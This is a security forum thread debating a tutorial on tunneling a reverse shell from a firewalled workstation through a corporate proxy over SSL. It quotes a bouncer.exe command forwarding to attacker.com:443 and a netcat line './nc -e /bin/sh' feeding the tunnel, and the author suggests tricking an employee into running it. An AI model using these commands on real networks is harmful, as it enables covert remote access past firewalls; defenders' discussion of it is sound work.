Gaining an interactive shell through SSL tunneling

[:-\]

Yay.. problem fixed..

[Tiger Shark]

I kind of made this point in a thread that many probably can't see, so I'll make it here.....

One of the reasons I come here is because there are several hundred "heads" all looking at the same problem, (computer security, in case anyone forgot..... ). We all can't think of everything but when you have all these "heads" looking at all the many facets of computer security it sure helps out.

So this post was of use..... I hadn't thought about it..... but then my users wouldn't know netcat if it jumped up and slapped them in the face..... But it's something I will bear in mind for the future should I chose to implement the kind of architecture nlxoo describes......

Girls and Boys..... Information is power..... Ignorance may be bliss, but it sure sucks when you stand in front of the CEO who is asking "how did this happen"? If nxloo came here to disseminate this information with malicious intent then more fool him, he helped the people who are "on the other team", if he came here to bring something to " the other team's" attention then more power to him. Negging him for shedding light on how to act nefariously, whatever his intent, is kind of self defeating on a security site, don't you think?

[Tedob1]

i couldn't agree with you more TS. i for one want to know what can be done to my network

[PuReExcTacy]

Originally posted here by nlxoo

Step 2:
On victim.company.com, the attacker executes:

Code:

bouncer.exe --bind 127.0.0.1 --port 9999 --destination attacker.com:443 --tunnel proxy.company.com:8080

If you can already do this, then what exactly are you gaining, you've already got shell access. Hell, from here, you can install whatever you want. And whatever remote admin tool you'd like. At that, I wouldn't set netcat to listen on my own box. That's just an invitation for someone else to check out your box.

You should mention this type of stuff, nice tutorial anyways.


--PuRe

[br_fusion]

I dont think the tutorial's purpose was to gain remote access, but just how to encrypt your traffic once you compromise the host.

[fl34bit3]

Well cheers to this. I definitly did not know that could be done. Thanks for the info. It shows thought that it is a win xp computer is it only for xp or possible on others.

PeacE
-BoB

[nlxoo]

Originally posted here by PuReExcTacy

If you can already do this, then what exactly are you gaining, you've already got shell access. Hell, from here, you can install whatever you want. And whatever remote admin tool you'd like.

But what if the victim's machine (10.0.4.15) is on a LAN and has no full Internet access except access to a single HTTP proxy server (10.0.0.4) for web browsing?

It's impossible to run a trojan/backdoor on the victim's machine and expect to connect or even reach the victim's machine from outside the LAN.

This method is for a hacker who already has physical access to the firewalled host, e.g. an employee of a company who wants access to his work workstation from home OR a hacker who fools an employee of the company to download and execute a program that is programmed to automatically carry out steps 2 & 3.

Originally posted here by PuReExcTacy

At that, I wouldn't set netcat to listen on my own box. That's just an invitation for someone else to check out your box.

eh? The netcat running on the attacker's host? That only opens port 443 and waits for someone to connect to the port. Not serving any data.

Originally posted here by fl34bit3
Thanks for the info. It shows thought that it is a win xp computer is it only for xp or possible on others.

This method will work on Windows 2000 but not on the Windows 9x series.

I did try it on a Linux host but the Linux port of Bouncer gave me a "Segmentation Fault" error.
But in theory, it should work on Linux if you do this instead for Step 3:

Code:

./nc -e /bin/sh 127.0.0.1 9999